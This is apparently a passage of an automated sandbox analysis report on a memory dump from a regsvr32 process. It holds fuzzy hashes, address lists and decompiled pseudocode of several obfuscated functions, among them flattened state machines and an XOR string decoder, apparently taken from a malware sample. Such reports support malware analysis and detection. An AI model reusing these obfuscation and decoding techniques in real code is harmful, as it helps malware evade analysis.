0x040f0b41
0x040f0b46
0x040f0b4e
0x040f0b5a
0x040f0b5f
0x040f0b6a
0x040f0b6d
0x040f0b71
0x040f0b79
0x040f0b81
0x040f0b89
0x040f0b91
0x040f0b99
0x040f0ba9
0x040f0bb1
0x040f0bb4
0x040f0bb8
0x040f0bc0
0x040f0bc8
0x040f0bcd
0x040f0bd5
0x040f0bdd
0x040f0bea
0x040f0bf6
0x040f0bfb
0x040f0c01
0x040f0c09
0x040f0c11
0x040f0c19
0x040f0c21
0x040f0c29
0x040f0c31
0x040f0c3d
0x040f0c42
0x040f0c48
0x040f0c50
0x040f0c58
0x040f0c61
0x040f0c66
0x040f0c6c
0x040f0c74
0x040f0c7c
0x040f0c88
0x040f0c90
0x040f0c94
0x040f0c9c
0x040f0ca4
0x040f0cac
0x040f0cb4
0x040f0cbc
0x040f0cc4
0x040f0cc9
0x040f0cd1
0x040f0cd9
0x040f0cd9
0x040f0ce7
0x040f0d50
0x040f0d51
0x040f0d5a
0x040f0d5c
0x040f0d61
0x040f0d63
0x00000000
0x040f0d63
0x040f0ce9
0x040f0cef
0x040f0d29
0x040f0d2e
0x040f0d33
0x040f0d35
0x00000000
0x040f0d35
0x040f0cf1
0x040f0cf7
0x00000000
0x040f0cfd
0x040f0cfd
0x00000000
0x040f0cfd
0x040f0cf7
0x040f0cef
0x00000000
0x040f0ce7
0x040f0d8e
0x040f0d93
0x040f0d96
0x040f0d9b
0x040f0d9b
0x040f0da8
0x040f0db0

Strings

i*_, xrefs: 040F0B14

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: i*_
API String ID: 0-4175851924
Opcode ID: 033916526ebd42fe384ae7de4cef2794808c9c5efeeb7d3c76fe8acba1a56522
Instruction ID: 9a2110ca5552b7e52af75031b0dce8dbd154f25559ce97df1b10989bfa4c55cc
Opcode Fuzzy Hash: 033916526ebd42fe384ae7de4cef2794808c9c5efeeb7d3c76fe8acba1a56522
Instruction Fuzzy Hash: AC8152B21093409FD354CF61D98991BFBE1EBC4B58F40892CF6929A264D3B6D949CF83

Uniqueness

Uniqueness Score: -1.00%

Function 040EC5D5, Relevance: 1.4, Strings: 1, Instructions: 194
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E040EC5D5() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				short _t190;
				signed int _t195;
				void* _t198;
				void* _t217;
				intOrPtr _t220;
				void* _t221;
				short* _t222;
				void* _t223;
				short* _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				void* _t232;

				_t220 =  *0x40f6214; // 0x0
				_v28 = 0x163a95;
				_t221 = _t220 + 0x23c;
				_t198 = 0x1db3eac;
				_t225 = 0x2a;
				_v28 = _v28 * 0x43;
				_v28 = _v28 | 0x78fa3d4f;
				_v28 = _v28 + 0xb7b9;
				_v28 = _v28 ^ 0x7df609b0;
				_v36 = 0x641eba;
				_v36 = _v36 / _t225;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0x02679a20;
				_v60 = 0x1f128d;
				_v60 = _v60 | 0x723f4715;
				_v60 = _v60 ^ 0x7234fc66;
				_v8 = 0xac331e;
				_v8 = _v8 ^ 0xe591128e;
				_v8 = _v8 << 4;
				_v8 = _v8 + 0xffffc28e;
				_v8 = _v8 ^ 0x53d02dfe;
				_v32 = 0x5bb4ea;
				_v32 = _v32 ^ 0xe8579be7;
				_v32 = _v32 + 0xffff04e9;
				_v32 = _v32 ^ 0xe8074079;
				_v40 = 0xd0bea7;
				_v40 = _v40 << 1;
				_t226 = 0x1d;
				_v40 = _v40 / _t226;
				_v40 = _v40 ^ 0x000c7110;
				_v64 = 0x41c151;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0x00828c11;
				_v44 = 0x3034cc;
				_t227 = 0x1a;
				_v44 = _v44 / _t227;
				_v44 = _v44 + 0xffffde13;
				_v44 = _v44 ^ 0x000cb2d3;
				_v12 = 0xb1859b;
				_v12 = _v12 ^ 0xe04d3b3c;
				_t228 = 0x25;
				_v12 = _v12 * 7;
				_v12 = _v12 | 0x0065acf4;
				_v12 = _v12 ^ 0x26e71960;
				_v68 = 0x4e3808;
				_v68 = _v68 | 0x4ec02654;
				_v68 = _v68 ^ 0x4ec4b15d;
				_v48 = 0x7afa7b;
				_v48 = _v48 ^ 0xc20923f7;
				_v48 = _v48 / _t228;
				_v48 = _v48 ^ 0x0544c062;
				_v20 = 0x2ff9aa;
				_v20 = _v20 + 0xffffa865;
				_v20 = _v20 * 0x24;
				_v20 = _v20 + 0x4632;
				_v20 = _v20 ^ 0x06bd6615;
				_v16 = 0x2d8807;
				_v16 = _v16 * 0x5f;
				_v16 = _v16 << 3;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0xcaf714e8;
				_v52 = 0xcb8ac1;
				_v52 = _v52 << 0xb;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 ^ 0x000dc079;
				_v24 = 0xed824f;
				_v24 = _v24 + 0x6e9c;
				_t229 = 0x19;
				_v24 = _v24 / _t229;
				_v24 = _v24 >> 0x10;
				_v24 = _v24 ^ 0x00044037;
				_v56 = 0xd4fc47;
				_v56 = _v56 << 5;
				_v56 = _v56 << 0xb;
				_v56 = _v56 ^ 0xfc4a9c10;
				_v72 = 0x35720e;
				_v72 = _v72 ^ 0x5bf10d31;
				_v72 = _v72 ^ 0x5bc050cb;
				do {
					while(_t198 != 0x1db3eac) {
						if(_t198 == 0x2b86adf) {
							E040DE404(_v56, 1, _v72, 3, _t221);
							 *((short*)(_t221 + 6)) = 0;
							return 0;
						}
						if(_t198 == 0x6ec99df) {
							_push(_t198);
							_push(_t198);
							_t230 = E040ECCA0(4, 0x10);
							E040DE404(_v52, 1, _v24, _t230, _t221);
							_t232 = _t232 + 0x1c;
							_t222 = _t221 + _t230 * 2;
							_t198 = 0x2b86adf;
							_t190 = 0x2e;
							 *_t222 = _t190;
							_t221 = _t222 + 2;
							continue;
						}
						if(_t198 != 0x6f740c2) {
							goto L8;
						}
						_push(_t198);
						_push(_t198);
						_t195 = E040ECCA0(4, 0x10);
						_push(_t221);
						_push(1);
						_push(_v64);
						_t231 = _t195;
						_t217 = 2;
						E040DE404(_v40, _t217);
						_t223 = _t221 + 2;
						E040DE404(_v44, 1, _v12, _t231, _t223);
						_t232 = _t232 + 0x28;
						_t224 = _t223 + _t231 * 2;
						_t198 = 0x6ec99df;
						_t190 = 0x5c;
						 *_t224 = _t190;
						_t221 = _t224 + 2;
					}
					E040DDC1B(_t198);
					_t198 = 0x6f740c2;
					L8:
				} while (_t198 != 0x41dad81);
				return _t190;
			}

0x040ec5dd
0x040ec5e5
0x040ec5ec
0x040ec5f6
0x040ec5fd
0x040ec600
0x040ec603
0x040ec60a
0x040ec611
0x040ec618
0x040ec626
0x040ec629
0x040ec62d
0x040ec634
0x040ec63b
0x040ec642
0x040ec649
0x040ec650
0x040ec657
0x040ec65b
0x040ec662
0x040ec669
0x040ec670
0x040ec677
0x040ec67e
0x040ec685
0x040ec68c
0x040ec692
0x040ec697
0x040ec69c
0x040ec6a3
0x040ec6aa
0x040ec6ad
0x040ec6b4
0x040ec6be
0x040ec6c3
0x040ec6c8
0x040ec6cf
0x040ec6d6
0x040ec6dd
0x040ec6e8
0x040ec6e9
0x040ec6ec
0x040ec6f3
0x040ec6fa
0x040ec701
0x040ec708
0x040ec70f
0x040ec716
0x040ec722
0x040ec725
0x040ec72c
0x040ec733
0x040ec73e
0x040ec741
0x040ec748
0x040ec74f
0x040ec75a
0x040ec75d
0x040ec761
0x040ec767
0x040ec76e
0x040ec775
0x040ec779
0x040ec77d
0x040ec784
0x040ec78b
0x040ec797
0x040ec79a
0x040ec79d
0x040ec7a1
0x040ec7a8
0x040ec7af
0x040ec7b3
0x040ec7b7
0x040ec7be
0x040ec7c5
0x040ec7cc
0x040ec7d3
0x040ec7d3
0x040ec7e5
0x040ec8bb
0x040ec8c5
0x00000000
0x040ec8c5
0x040ec7f1
0x040ec85e
0x040ec85f
0x040ec869
0x040ec876
0x040ec87b
0x040ec87e
0x040ec881
0x040ec888
0x040ec889
0x040ec88c
0x00000000
0x040ec88c
0x040ec7f9
0x00000000
0x00000000
0x040ec80b
0x040ec80c
0x040ec811
0x040ec816
0x040ec817
0x040ec819
0x040ec81f
0x040ec823
0x040ec824
0x040ec829
0x040ec837
0x040ec83c
0x040ec83f
0x040ec842
0x040ec849
0x040ec84a
0x040ec84d
0x040ec84d
0x040ec897
0x040ec89c
0x040ec8a1
0x040ec8a1
0x00000000

Strings

<;M, xrefs: 040EC6DD

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: <;M
API String ID: 0-164005337
Opcode ID: f2e41622ac11b3c9240027dbb4e6a1b510a890aa538c29b0ec5d371162d7c65c
Instruction ID: f8abb5d60c41c307f0e862ed04c2178a9fd211467db289b7e6c54e5c2f1e3e0d
Opcode Fuzzy Hash: f2e41622ac11b3c9240027dbb4e6a1b510a890aa538c29b0ec5d371162d7c65c
Instruction Fuzzy Hash: C4917771D00219EFDB58CFA5D98A9EEBBB1FF44314F20805AE512BB250D7B41A46CF94

Uniqueness

Uniqueness Score: -1.00%

Function 040D1F38, Relevance: 1.4, Strings: 1, Instructions: 134
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E040D1F38(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				char _v556;
				intOrPtr _v564;
				char _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				void* _t89;
				signed int _t97;
				intOrPtr _t102;
				signed int _t104;
				char* _t105;
				void* _t119;
				signed int* _t125;

				_push(E040DE5C0);
				_push(_a4);
				_t102 = __ecx;
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t89);
				_v588 = 0xa9001c;
				_t125 =  &(( &_v624)[4]);
				_v588 = _v588 + 0xfffff841;
				_v588 = _v588 ^ 0x00a8f85f;
				_t119 = 0x7750dec;
				_v596 = 0x801276;
				_v596 = _v596 << 8;
				_v596 = _v596 ^ 0x801c5a8c;
				_v592 = 0xe5da65;
				_v592 = _v592 | 0x8d0ca196;
				_v592 = _v592 ^ 0x8de55992;
				_v612 = 0x74ea46;
				_v612 = _v612 >> 6;
				_v612 = _v612 | 0x4c0dce94;
				_v612 = _v612 ^ 0x4c0245c2;
				_v604 = 0x7f8ae0;
				_t104 = 0x6f;
				_v604 = _v604 / _t104;
				_v604 = _v604 + 0x431c;
				_v604 = _v604 ^ 0x0002d2ab;
				_v608 = 0x66ed0;
				_v608 = _v608 >> 5;
				_v608 = _v608 * 0x5a;
				_v608 = _v608 ^ 0x001395e3;
				_v620 = 0x99715e;
				_v620 = _v620 + 0xffff5a71;
				_v620 = _v620 << 0x10;
				_v620 = _v620 + 0xbf19;
				_v620 = _v620 ^ 0xcbc1aabc;
				_v624 = 0x2a4f9d;
				_v624 = _v624 | 0x7ed7085f;
				_v624 = _v624 + 0xffff4297;
				_v624 = _v624 | 0x5a00af06;
				_v624 = _v624 ^ 0x7efc78c9;
				_v600 = 0xb3c9ce;
				_v600 = _v600 + 0xffff4f2d;
				_v600 = _v600 ^ 0x00b0dce6;
				_t118 = _v600;
				_v616 = 0x17dc9d;
				_v616 = _v616 ^ 0xb350768a;
				_v616 = _v616 + 0xffff5841;
				_v616 = _v616 ^ 0xb3483330;
				do {
					while(_t119 != 0x26f316f) {
						if(_t119 == 0x4832572) {
							_v556 = 0x22c;
							_t105 =  &_v556;
							_t97 = E040DBD23(_t105, _t118, _v612, _v604, _v608);
							_t125 =  &(_t125[3]);
							L12:
							asm("sbb esi, esi");
							_t119 = ( ~_t97 & 0xf2b580e0) + 0xfb9b08f;
							continue;
						}
						if(_t119 == 0x7750dec) {
							_v564 = _t102;
							_t119 = 0xecc24d5;
							continue;
						}
						if(_t119 == 0x88070fd) {
							_t97 = E040F06EC(_v620, _t118, _v624,  &_v556);
							_pop(_t105);
							goto L12;
						}
						if(_t119 != 0xecc24d5) {
							if(_t119 == 0xfb9b08f) {
								return E040F1538(_v600, _v616, _t118);
							}
							goto L18;
						}
						_push(_t105);
						_t97 = E040D7603(_v588);
						_t118 = _t97;
						_t105 = _t105;
						__eflags = _t97 - 0xffffffff;
						if(__eflags != 0) {
							_t119 = 0x4832572;
							continue;
						}
						L8:
						return _t97;
					}
					__eflags = E040DE5C0(__eflags,  &_v556,  &_v584);
					if(__eflags == 0) {
						_t119 = 0xfb9b08f;
						goto L18;
					} else {
						_t119 = 0x88070fd;
						continue;
					}
					goto L8;
					L18:
					__eflags = _t119 - 0x5c72449;
				} while (__eflags != 0);
				return _t97;
			}

0x040d1f42
0x040d1f47
0x040d1f4e
0x040d1f50
0x040d1f51
0x040d1f52
0x040d1f57
0x040d1f5f
0x040d1f62
0x040d1f6c
0x040d1f74
0x040d1f79
0x040d1f86
0x040d1f8b
0x040d1f93
0x040d1f9b
0x040d1fa3
0x040d1fab
0x040d1fb3
0x040d1fb8
0x040d1fc0
0x040d1fc8
0x040d1fd6
0x040d1fd9
0x040d1fdd
0x040d1fe5
0x040d1fed
0x040d1ff5
0x040d1fff
0x040d2003
0x040d200b
0x040d2013
0x040d201b
0x040d2020
0x040d2028
0x040d2030
0x040d2038
0x040d2040
0x040d2048
0x040d2050
0x040d2058
0x040d2060
0x040d2068
0x040d2070
0x040d2074
0x040d207c
0x040d2084
0x040d208c
0x040d2094
0x040d2094
0x040d20a6
0x040d2146
0x040d2152
0x040d215a
0x040d215f
0x040d211f
0x040d2123
0x040d212b
0x00000000
0x040d212b
0x040d20b2
0x040d2132
0x040d2136
0x00000000
0x040d2136
0x040d20ba
0x040d2118
0x040d211e
0x00000000
0x040d211e
0x040d20c2
0x040d20c6
0x00000000
0x040d20da
0x00000000
0x040d20c6
0x040d20ee
0x040d20f4
0x040d20f9
0x040d20fc
0x040d20fd
0x040d2100
0x040d2102
0x00000000
0x040d2102
0x040d20e5
0x040d20e5
0x040d20e5
0x040d2173
0x040d2175
0x040d2181
0x00000000
0x040d2177
0x040d2177
0x00000000
0x040d2177
0x00000000
0x040d2183
0x040d2183
0x040d2183
0x00000000

Strings

Ft, xrefs: 040D1FAB

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Ft
API String ID: 0-1468847975
Opcode ID: 7ed1f04ad8c6e767010535ad52ccbbf717b4946e25d9870dcc3f36dbad24b302
Instruction ID: 0f388f0e8a235bba5a7e8c7ff10e818d04b27854f8d1b72f2158e3b6879ad557
Opcode Fuzzy Hash: 7ed1f04ad8c6e767010535ad52ccbbf717b4946e25d9870dcc3f36dbad24b302
Instruction Fuzzy Hash: 7C519D7290C3018BC358DF64D88541FBBE0BBD8728F144A5DF599A6261E3B1EA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 040EE1F8, Relevance: 1.4, Strings: 1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E040EE1F8(signed int* __ecx, void* __edx, void* __eflags) {
				void* _t64;
				signed int _t73;
				short* _t92;
				signed int _t93;
				signed int _t99;
				unsigned int _t100;
				unsigned int _t101;
				signed int _t110;
				short* _t111;
				signed int* _t112;
				signed int* _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				unsigned int _t118;
				void* _t124;
				short _t126;
				void* _t128;
				void* _t130;

				_push( *(_t128 + 0x30));
				_push( *(_t128 + 0x30));
				_push( *(_t128 + 0x30));
				_push(__ecx);
				E040EFE29(_t64);
				 *(_t128 + 0x28) = 0xaa6cff;
				_t112 =  &(__ecx[1]);
				 *(_t128 + 0x28) =  *(_t128 + 0x28) + 0x5a3e;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) << 0xc;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) ^ 0xac7afad8;
				 *(_t128 + 0x24) = 0xf23620;
				_t114 = 0x4f;
				 *(_t128 + 0x28) =  *(_t128 + 0x24) / _t114;
				_t115 = 0x1d;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) / _t115;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) ^ 0x0000f47a;
				 *(_t128 + 0x24) = 0x6765f0;
				 *(_t128 + 0x24) =  *(_t128 + 0x24) | 0x7b5bc89c;
				 *(_t128 + 0x24) =  *(_t128 + 0x24) >> 1;
				 *(_t128 + 0x24) =  *(_t128 + 0x24) ^ 0x3db51d28;
				 *(_t128 + 0x30) = 0xe89ec2;
				_t116 = 0x26;
				 *(_t128 + 0x2c) =  *(_t128 + 0x30) / _t116;
				 *(_t128 + 0x2c) =  *(_t128 + 0x2c) ^ 0x00078a4c;
				_t110 =  *__ecx;
				_t113 =  &(_t112[1]);
				_t73 =  *_t112 ^ _t110;
				 *(_t128 + 0x30) = _t110;
				 *(_t128 + 0x34) = _t73;
				_t118 =  !=  ? (_t73 + 0x00000001 & 0xfffffffc) + 4 : _t73 + 1;
				_t92 = E040DC5D8(_t118 + _t118);
				_t130 = _t128 + 0x18;
				 *((intOrPtr*)(_t130 + 0x18)) = _t92;
				if(_t92 != 0) {
					_t126 = 0;
					_t111 = _t92;
					_t124 =  >  ? 0 :  &(_t113[_t118 >> 2]) - _t113 + 3 >> 2;
					if(_t124 != 0) {
						_t93 =  *(_t130 + 0x20);
						do {
							_t99 =  *_t113;
							_t113 =  &(_t113[1]);
							_t100 = _t99 ^ _t93;
							 *_t111 = _t100 & 0x000000ff;
							_t111 = _t111 + 8;
							 *((short*)(_t111 - 6)) = _t100 >> 0x00000008 & 0x000000ff;
							_t101 = _t100 >> 0x10;
							_t126 = _t126 + 1;
							 *((short*)(_t111 - 4)) = _t101 & 0x000000ff;
							 *((short*)(_t111 - 2)) = _t101 >> 0x00000008 & 0x000000ff;
						} while (_t126 < _t124);
						_t92 =  *((intOrPtr*)(_t130 + 0x1c));
					}
					 *((short*)(_t92 +  *(_t130 + 0x24) * 2)) = 0;
				}
				return _t92;
			}

0x040ee1fe
0x040ee202
0x040ee206
0x040ee20b
0x040ee20c
0x040ee211
0x040ee219
0x040ee21c
0x040ee226
0x040ee22b
0x040ee233
0x040ee241
0x040ee246
0x040ee250
0x040ee255
0x040ee25b
0x040ee263
0x040ee26b
0x040ee273
0x040ee277
0x040ee27f
0x040ee28b
0x040ee28e
0x040ee292
0x040ee29a
0x040ee29e
0x040ee2a1
0x040ee2a3
0x040ee2a7
0x040ee2bb
0x040ee2da
0x040ee2dc
0x040ee2df
0x040ee2e5
0x040ee2ed
0x040ee2ef
0x040ee300
0x040ee305
0x040ee307
0x040ee30b
0x040ee30b
0x040ee30d
0x040ee310
0x040ee315
0x040ee31d
0x040ee323
0x040ee327
0x040ee330
0x040ee331
0x040ee338
0x040ee33c
0x040ee340
0x040ee340
0x040ee34b
0x040ee34b
0x040ee357

Strings

>Z, xrefs: 040EE21C

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: >Z
API String ID: 0-2342695272
Opcode ID: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
Instruction ID: 48bb1e831fe6b26f385e5628289777dd7ab4e2ef1dc869272515f4962a73b219
Opcode Fuzzy Hash: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
Instruction Fuzzy Hash: C9417E726183119BD304DF2AC48586BFBE1FFC8718F494A6EF889A7250D774E905CB86

Uniqueness

Uniqueness Score: -1.00%

Function 040D55FF, Relevance: 1.4, Strings: 1, Instructions: 109
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E040D55FF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t75;
				void* _t84;
				signed int _t88;
				signed int _t89;
				void* _t92;
				intOrPtr _t109;
				signed int* _t112;

				_t108 = _a12;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t75);
				_v68 = 0x7ffd4d;
				_t109 = 0;
				_v64 = 0;
				_t112 =  &(( &_v96)[5]);
				_v80 = 0x808dec;
				_v80 = _v80 << 7;
				_t92 = 0x1c7cd09;
				_t88 = 0x24;
				_v80 = _v80 * 0x7a;
				_v80 = _v80 ^ 0xa1de2a47;
				_v84 = 0x460263;
				_v84 = _v84 + 0xffffc38b;
				_v84 = _v84 + 0xffffb2e6;
				_v84 = _v84 ^ 0x0042c6ce;
				_v88 = 0x2af47a;
				_v88 = _v88 + 0xfffff2b2;
				_v88 = _v88 ^ 0xf3d8a894;
				_v88 = _v88 ^ 0xf3ffbcf7;
				_v92 = 0xf8385b;
				_v92 = _v92 / _t88;
				_v92 = _v92 + 0xffff302a;
				_v92 = _v92 ^ 0x00085c4c;
				_v96 = 0xec2811;
				_t89 = 0x6c;
				_v96 = _v96 / _t89;
				_v96 = _v96 | 0xeb0c0969;
				_v96 = _v96 ^ 0x646fa875;
				_v96 = _v96 ^ 0x8f64cfef;
				_v72 = 0x6e85b8;
				_v72 = _v72 + 0x990a;
				_v72 = _v72 + 0xffff81c6;
				_v72 = _v72 ^ 0x00684c5c;
				_v76 = 0xd1f521;
				_v76 = _v76 | 0xdf7ffbcd;
				_v76 = _v76 ^ 0xdff37ac7;
				do {
					while(_t92 != 0x19e170b) {
						if(_t92 == 0x1c7cd09) {
							_t92 = 0x19e170b;
							continue;
						} else {
							if(_t92 == 0x305f804) {
								_t84 = E040F2BF0(_v88,  &_v60, _v92, _v96, _t108);
								_t112 =  &(_t112[3]);
								__eflags = _t84;
								if(__eflags != 0) {
									_t92 = 0xecd5788;
									continue;
								}
							} else {
								_t117 = _t92 - 0xecd5788;
								if(_t92 != 0xecd5788) {
									goto L11;
								} else {
									E040E9D3E( &_v60, _v72, _t117, _v76, _t108 + 0x24);
									_t109 =  !=  ? 1 : _t109;
								}
							}
						}
						L6:
						return _t109;
					}
					E040D22A6(_a8, _v80,  &_v60, _v84);
					_t112 =  &(_t112[2]);
					_t92 = 0x305f804;
					L11:
					__eflags = _t92 - 0xfbce5f5;
				} while (__eflags != 0);
				goto L6;
			}

0x040d5606
0x040d560a
0x040d560b
0x040d560f
0x040d5613
0x040d5614
0x040d5615
0x040d561a
0x040d5622
0x040d5624
0x040d5628
0x040d562b
0x040d5635
0x040d563a
0x040d564b
0x040d564e
0x040d5652
0x040d565a
0x040d5662
0x040d566a
0x040d5672
0x040d567a
0x040d5682
0x040d568a
0x040d5692
0x040d569a
0x040d56aa
0x040d56ae
0x040d56b6
0x040d56be
0x040d56ca
0x040d56d2
0x040d56d6
0x040d56de
0x040d56e6
0x040d56ee
0x040d56f6
0x040d56fe
0x040d5706
0x040d570e
0x040d5716
0x040d571e
0x040d5726
0x040d5726
0x040d5730
0x040d5788
0x00000000
0x040d5732
0x040d5738
0x040d5778
0x040d577d
0x040d5780
0x040d5782
0x040d5784
0x00000000
0x040d5784
0x040d573a
0x040d573a
0x040d573c
0x00000000
0x040d573e
0x040d574e
0x040d575a
0x040d575a
0x040d573c
0x040d5738
0x040d575e
0x040d5766
0x040d5766
0x040d579d
0x040d57a2
0x040d57a5
0x040d57aa
0x040d57aa
0x040d57aa
0x00000000

Strings

\Lh, xrefs: 040D5706

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: \Lh
API String ID: 0-2235754405
Opcode ID: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
Instruction ID: 5899f424c45c629cd7eeb635f8c2f806fcff87d9ef1fc7ce78d2cb22dfd79b28
Opcode Fuzzy Hash: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
Instruction Fuzzy Hash: B6417A71208342DFD758CE25D84482FBBE5FFD8318F104A1DF9A562260E775DA09CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 040DE640, Relevance: 1.4, Strings: 1, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E040DE640(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t68;
				void* _t78;
				signed int _t79;
				void* _t82;
				void* _t97;
				signed int* _t100;

				_t96 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t68);
				_v68 = 0x77f17d;
				_t100 =  &(( &_v88)[4]);
				_v68 = _v68 + 0xffffbc47;
				_v68 = _v68 ^ 0x007a21f6;
				_t97 = 0;
				_v76 = 0xd01664;
				_t82 = 0xf37e824;
				_t79 = 0x2a;
				_v76 = _v76 * 0x7b;
				_v76 = _v76 + 0xc6ac;
				_v76 = _v76 ^ 0x63f53bf0;
				_v84 = 0xca0bb3;
				_v84 = _v84 | 0xec4cd5b6;
				_v84 = _v84 ^ 0xa5b6880a;
				_v84 = _v84 + 0x809e;
				_v84 = _v84 ^ 0x497d3a42;
				_v72 = 0x505b1c;
				_v72 = _v72 | 0xf2745011;
				_v72 = _v72 ^ 0xf27af575;
				_v88 = 0x8ba087;
				_v88 = _v88 + 0x570e;
				_v88 = _v88 + 0xffffc480;
				_v88 = _v88 >> 5;
				_v88 = _v88 ^ 0x00062f0c;
				_v64 = 0x507489;
				_v64 = _v64 + 0x50d6;
				_v64 = _v64 ^ 0x0059b1d9;
				_v80 = 0x3c915f;
				_v80 = _v80 + 0xba86;
				_v80 = _v80 / _t79;
				_v80 = _v80 + 0x3cb0;
				_v80 = _v80 ^ 0x00080f7c;
				do {
					while(_t82 != 0x5422f69) {
						if(_t82 == 0xc053a7e) {
							__eflags = E040E9D3E( &_v60, _v64, __eflags, _v80, _t96 + 4);
							_t97 =  !=  ? 1 : _t97;
						} else {
							if(_t82 == 0xe18d46d) {
								_t78 = E040F2BF0(_v84,  &_v60, _v72, _v88, _t96);
								_t100 =  &(_t100[3]);
								__eflags = _t78;
								if(__eflags != 0) {
									_t82 = 0xc053a7e;
									continue;
								}
							} else {
								if(_t82 != 0xf37e824) {
									goto L9;
								} else {
									_t82 = 0x5422f69;
									continue;
								}
							}
						}
						L12:
						return _t97;
					}
					E040D22A6(_a4, _v68,  &_v60, _v76);
					_t100 =  &(_t100[2]);
					_t82 = 0xe18d46d;
					L9:
					__eflags = _t82 - 0xc897eb;
				} while (__eflags != 0);
				goto L12;
			}

0x040de647
0x040de64b
0x040de64c
0x040de650
0x040de651
0x040de652
0x040de657
0x040de65f
0x040de662
0x040de66c
0x040de674
0x040de676
0x040de67e
0x040de68f
0x040de690
0x040de694
0x040de69c
0x040de6a4
0x040de6ac
0x040de6b4
0x040de6bc
0x040de6c4
0x040de6cc
0x040de6d4
0x040de6dc
0x040de6e4
0x040de6ec
0x040de6f4
0x040de6fc
0x040de701
0x040de709
0x040de711
0x040de719
0x040de721
0x040de729
0x040de73c
0x040de740
0x040de748
0x040de750
0x040de750
0x040de756
0x040de7cf
0x040de7d1
0x040de758
0x040de75e
0x040de77d
0x040de782
0x040de785
0x040de787
0x040de789
0x00000000
0x040de789
0x040de760
0x040de766
0x00000000
0x040de768
0x040de768
0x00000000
0x040de768
0x040de766
0x040de75e
0x040de7d5
0x040de7dd
0x040de7dd
0x040de79e
0x040de7a3
0x040de7a6
0x040de7ab
0x040de7ab
0x040de7ab
0x00000000

Strings

B:}I, xrefs: 040DE6C4

Memory Dump Source

